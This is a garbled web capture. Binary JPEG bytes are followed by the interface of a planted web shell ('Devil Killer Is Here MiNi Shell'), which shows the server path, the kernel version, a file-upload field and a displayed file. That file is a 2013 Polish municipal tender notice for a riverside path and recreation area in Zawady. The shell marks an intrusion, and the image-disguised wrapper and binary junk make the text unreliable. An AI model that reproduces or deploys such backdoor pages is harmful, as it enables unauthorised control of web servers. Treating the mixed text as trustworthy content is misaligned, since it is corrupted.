JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131224/535442-N-2013.html

<p class="kh_header"><b>Zawady: Przebudowa ciągu pieszo-rowerowego z montażem małej architektury wraz z budową drogi gminnej ul. Spokojnej</b><br>
<b>Numer ogłoszenia: 535442 - 2013; data zamieszczenia: 24.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Popów Zawady , ul. Częstochowska 6, 42-110 Zawady, woj. śląskie, tel. 034 3177067, faks 034 3177067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminapopow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.gminapopow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągu pieszo-rowerowego z montażem małej architektury wraz z budową drogi gminnej ul. Spokojnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia są:  Zagospodarowanie terenu wokół urzędu gminy Popów w msc. Zawady
Wspólny  Słownik Zamówień CPV  
45233252-0 Roboty w zakresie nawierzchni ulic.
45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych.
45233220-7 Roboty w zakresie nawierzchni dróg.
45233222-1 Roboty w zakresie chodników.
45232410-9 Roboty w zakresie kanalizacji ściekowej.
45315300-1 Instalatorstwo linii energetycznych 
45242000-5 Budowa infrastruktury wypoczynkowej na terenach nadwodnych
 
Przedmiotem zamówienia jest zagospodarowanie terenu nad rzeką Liswartą w Zawadach.  Teren objęty obszarem opracowania posiada pow. 3450,00 m kw. Teren łagodnie opada w stronę rzeki tj w kierunku północno- wschodnim. Na obszarze nie ma większych różnic terenu wymagających tworzenia np. schodów czy murów oporowych. Na terenie znajduje się wejście na wiszący most nad rzeką Liswartą. Obecnie most wymaga remontu i jest niedostępny, jednakowoż jest on celem spacerów i wzbudza zainteresowanie. Ten odcinek rzeki jest atrakcyjny w lecie, łagodne nabrzeże zachęca do plażowania i umożliwia wyciąganie kajaków podczas postojów. Obecnie dojazd nad teren rzeki odbywa się drogą gruntową o szerokości ok 3 m. Na terenie nie znajduje się infrastruktura podziemna
Uwaga: należy wykonać wszystkie roboty określone łącznie ww dokumentami.
Teren inwestycji zostanie przystosowany do wypoczynku, rekreacji oraz uprawiania sportów.
Opracowywany obszar można podzielić na trzy strefy funkcjonalne funkcjonujące w opracowaniu graficznym jako podział na fragmenty A,B i C. Pierwsza strefa FRAGEMENT A to projektowana droga dojazdowa w pobliżu istniejącego
parkingu przy budynku urzędu gminy. W projektowanej drodze ma nastąpić podział pasa jezdnego i zmiana nawierzchni. Projekt nawierzchni należy traktować jako aneks zmieniający nawierzchnię do projektu budowlanego : Budowa drogi gminnej nr 6790215S ul. Spokojna dł.250 m wraz z infrastrukturą towarzyszącą Droga ma zostać podzielona wzdłuż na dwa pasy tj. pas jezdny szerokości 3m z kostki granitowej i pas rekreacyjny szer.2 m z kostki betonowej, który łączy się z chodnikiem. W pasie rekreacyjnym zostaną zamontowane urządzenia do ćwiczeń tzw. siłownia zewnętrzna. Patrz rozmieszczenie urządzeń słupków betonowych oraz kul betonowych. W pasie rekreacyjnym
zastoswanow wzór z kostek granitowych 9 11. 
Kolejną strefą FRAGMENT C jest to przebudowana droga gruntowa prowadząca do terenu nad rzeką. Ciąg ten ma zostać usytuowany na przedłużeniu drogi dojazdowej, ale ma pełnić funkcję deptaka pieszego z możliwością wykorzystania jako pasa dojazdowego dla samochodów ratownictwa.
Deptak ma mieć funkcję rekreacyjną, jako pas nawierzchni np. do biegania lub rowerowy. Zakaz wjazdu pojazdów na deptak ma zostać wymuszony za pomocą dwóch blokad drogowych. 
Strefa nad rzeką FRAGMENT B ma pełnić funkcję wypoczynkową , ścieżki na obszarze tworzą pętlę umożliwiającą spacery i jazdę na rowerach i łyżworolkach. Na przedłużeniu deptaka , w zakresie wody płynącej ma zostać zbudowany pomost-molo. Drugi pomost to pomost pływakowy, z zastosowaniem pływaków PCV łatwych do domontażu na zimę. Wzdłuż ścieżek mają zostać ustawione ławki murowane, ławki młodzieżowe, kosze na śmieci, stojaki rowerowe oraz drewniana osłona na tymczasowe toalety.

3.  Roboty należy wykonać zgodnie z obowiązującymi przepisami i normami technicznymi, oraz na zasadach określonych w  niniejszej SIWZ.

Wszystkie nazwy własne podane w opracowaniu mają charater orjentacyjny i dopuszcza sie zastosowanie materiałów równowaznych dla których minimalne parametry podajemy poniżej : 
Równoważność minimalne parametry 


1. Kosze na  śmieci - Komservis Kobe 003342 - za równoważny uzna się produkt wykonany z betonu odlewniczego z pojemnikiem i popielniczką ze stali ocynkowanej kolory szarego o wymiarach nie mniejszych niż : 
 
wysokość:	60 cm	   
średnica:	50 cm	   
pojemność:	45 l	 
I nie większych niż 


wysokość:	68 cm	   
średnica:	59 cm	   
pojemność:	45 l	 

	2. Słupki betonowe - Komserwis Kobe 005381 -  za równoważny uzna się produkt  słupek z betonu odlewniczego koloru szarego o wymiarach nie mniejszych niż :
	Wymiary 

wysokość:	60cm	   
średnica:	30 cm	 

	3. Kule - słupki betonowe Komserwis -  za równoważny uzna się produkt  słupek z betonu odlewniczego w kształcie kuli  koloru szarego o wymiarach nie mniejszych niż 
 
wysokość:	55 cm	   
średnica:	60 cm	 

4. Stojaki rowerowe Komserwis York 008255 -  równoważny uzna się produkt wykonany ze stali i żeliwa lakierowanego  w kolorze czarnym o wymiarach nie mniejszych niż 

wysokość:	78 cm	   
szerokość:	40 cm	   
długość:	160 cm	   
ilość miejsc: 3 	 

5. Tablica informacyjna Komserwis York 010245 za  równoważny uzna się produkt wykonany konstrukcja: stal i żeliwo lakierowane tablica: kompozyt polimerowy powierzchnia ekspozycyjna: płyta PCV o wymiarach nie mniejszych niż : 

 
wysokość:	250 cm	   
szerokość:	12 cm	   
długość:	55 cm	   
powierzchnia ekspozycyjna:	45x65 cm	 

6.	Słupek Parkingowy blokada drogi Bramer Typ  A za równoważny uzna się produkt : Słupek parkingowy wykonany z kształtowników zamknietych stalowych, czyniących go stabilnym i trwałym. Zabezpieczony podkładem antykorozyjnym oraz farbą nawierzchniową
7.	Ławka młodzieżowa MagicNe   za równoważny uznaje się produkt - Urządzenie składające  się z siedziska i belki umożliwiającej podparcie stóp. Podstawy ławki zakotwione w gruncie. Konstrukcja wykonana ze stali ocynkowanej ogniowo. Całość zakotwiona jw gruncie przy pomocy fundamentów betonowych. O wymiarach nie mniejszych niż :
	 Długość:  1,7 m
	Szerokość: 0,5 m
	Wysokość: 0,95 m
8.	Wyciskacz siedzący THJ-DO1 + wycią górny THJ-D22 + pylon R wsp.3,5 za równoważny produkt uznaje się :  urządzenie pozwalające na Wzmacnia mięśnie ramion, klatki piersiowej, pleców i obręczy barkowej. Poprawia ogólną kondycję fizyczną.  Wzmacnia mięśnie obręczy barkowej, grzbietu i ramion. Poprawia ogólną kondycję fizyczną. Stopień trudności  o wymiarach nie mniejszych niż
	2300 x 600 x 2000 mm 
9.	Orbitek THJ-D11 = narty biegówki THJD22 + pylon R wsp.3,5  za równoważny produkt uznaje się :  urządzenie pozwalające na poprawa muskulatury nóg i rąk, ogólna poprawa kondycji fizycznej i wydolności organizmu. Korzystnie wpływa na układ krążenia i układ oddechowy. Redukuje tkankę tłuszczów oraz Poprawa muskulatury nóg i rąk, uelastycznienie i rozciągnięcie ścięgien nóg. Ogólna poprawa kondycji, utrata tkanki tłuszczowej. Korzystnie wpływa na układ krążenia, układ oddechowy i trawienny. Wzmacnia serce i płuca. O wymiarach nie mniejszych niż : 
	2900 x 500 x 2000 mm 
10.	Motyl klasyczny + Motyl odwrócony -inwerso THJ-DO8 pylon R wsp.3, za równoważny produkt uznaje się :  urządzenie pozwalające na Wzmocnienie mięśni rąk, mięśni obręczy barkowej, mięśni klatki piersiowej oraz grzbietu. O wymiarach nie mniejszych niż :
	2300 x 900 x 2000 mm 
11.	Biegacz THJ-DO4 + prasa nożna THJ=DO5 pylon R wsp.3, :  za równoważny produkt uznaje się urządzenie pozwalające na Wzmacnia mięśnie nóg i pasa biodrowego. Uelastycznia i rozciąga ścięgna kończyn dolnych. Zwiększa ruchomość stawów kolanowych i biodrowych. Korzystnie wpływa na układ krążenia, serce i płuca oraz Poprawa muskulatury nóg, mięśnia czworogłowego uda, dwugłowego łydki oraz mięśni brzucha  o wymiarach nie mniejszych niż : 2300 x 830 x 2000 mm 
12.	Twister THJ-D21 + wachadło DO + pylon wsp. 3,5  za równoważny produkt uznaje się urządzenie pozwalające na Likwidacja tkanki tłuszczowej w obrębie talii i bioder, poprawa ruchomości odcinka krzyżowo-lędźwiowego z równoczesnym rozluźnianiem mięśni pleców o wymiarach nie mniejszych niż : 1680 x 580 x 2000 mm 
13.	 Nawierzchnia Terra Way - za równoważne uzna się : Nawierzchnia wodoprzepuszczalna mineralno-żywiczna Ekologiczna nawierzchnia wodoprzepuszczalna  mieszanka mineralno żywiczna, górna warstwa nawierzchni twarda, drenująca, układana na podbudowie. Nawierzchnia wykonana z  kamienia twardego o frakcji kruszywa 1 - 2 mm, 2 - 4 mm, 3 - 5 mm, 4 - 6 mm lub kombinacji ziarna od 1 - 6 mm wypełniacz i specjalnej żywicy dwuskładnikowej na bazie żywic epoksydowych zwanej spoiwem.  Produkt powinien posiadać aktualny Atest Higieniczny dopuszczający do profesjonalnego stosowania na nawierzchnie dróg rowerowych, ścieżek parkowych, boisk, placów zabaw, parkingów itp.oraz Aprobatę Techniczną Instytutu Badawczego Dróg i Mostów stwierdzającą przydatność tego wyrobu do stosowania w inżynierii komunikacyjnej, a w szczególności do wykonywania następujących typów nawierzchni drogowych: Ścieżek rowerowych, chodników, chodników z możliwością czasowego przejazdu pojazdów do 2500kG, mogąca być również stosowaną do budowy parkingów z dopuszczonymi pojazdami 80 kN i 115 kN. Ponadto może być stosowana do wykonania ścieżek, placów zabaw dla dzieci i na boiskach szkolnych oraz na podjazdach i zjazdach dla wózków inwalidzkich. Nawierzchnia mineralno-żywiczna wymaga wprowadzenia dylatacji. Powierzchnie dylatowane do 25 m2, dylatacje poprzeczne w odległości co 5 m. Głębokość szczelin dylatacyjnych min. 50% grubości górnej warstwy.
	
14.	 Latarnie oświetleniowe parkowe - słup aluminiowy Rossa SAL4/8600 H+ 4m, oprawa OPC-1 klosz Auris przezroczysty  za równoważne uzna się :Słupy o średnicy nie mniejszej niż 114 mm przy podstawie oraz zakończeniu nie mniejszej niż 60 mm przystosowane są do mocowania na szczycie słupa pojedyńczej oprawy lub jednoelemetowych wysięgników typu WA. Podstawa słupa  tłoczona z blachy aluminiowej o grubości  nie mniejszej niż 8 mm.  Wysokość 4 m. oraz klosze z kołnierzem o średnicy nie mniejszej niż 150 na zaczepy bagnetowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.32.53-7, 45.23.32.20-7, 45.23.32.22-1, 45.23.24.10-9, 45.31.53.00-1, 45.24.20.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 10.000,-zł należy wnieść w terminie do dnia 07.01.2014 r.  do godz. 1000. 
Wadium należy wnieść w formie określonej w art. 45 ust. 6 ustawy pzp
Wadium wnoszone w pieniądzu wpłaca się przelewem na konto Zamawiającego, rachunek bankowy: BS Zawady nr konta 94 8259 0004 2000 0000 0013 0007
Wadium w innej formie niż pieniądz należy złożyć w postaci oryginału  w siedzibie Zamawiającego (pokój nr 12 - sekretariat); natomiast kserokopię potwierdzoną za zgodność - załączyć do oferty. W tym przypadku treść dokumentu, stanowiącego wadium, nie może ograniczać praw Zamawiającego i musi być zgodna z zapisami ustawy Prawo zamówień publicznych.
Zwrot wadium następuje na zasadach określonych w art. 46 ustawy pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia  do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie : to jest w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej dwa zamówienia odpowiadające przedmiotowi niniejszego zamówienia, tzn. wykonali dwie roboty budowlane, w tym przynajmniej jedna o wartości brutto nie mniejszej niż 600 000,00 złotych polegające na wykonaniu zagospodarowania terenu. W tym jedna z wykonanych prac polegających na zagospodarowaniu terenu powinna dotyczyć zagospodarowania terenu pod potrzeby turystyczne. 
Uwaga!
Jako zagospodarowanie terenu pod potrzeby turystyczne należy rozumieć drogę, szlak, ścieżkę, obszar leżący lub przechodzący przez tereny o znacznych walorach turystyczno krajoznawczych łączących miejscowości lub obiekty stanowiące cel poznania krajoznawczego lub kulturowego zagospodarowane dla potrzeb turystyki. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów(referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, w tym  kierownikiem budowy,:  1 osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej oraz min 1 osoba z uprawnieniami budowlany w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych
w rozumieniu ustawy Prawo budowlane</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
w tym posiadają aktualne ubezpieczenie od odpowiedzialność cywilnej w zakresie prowadzonej działalności na kwotę minimum 250.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
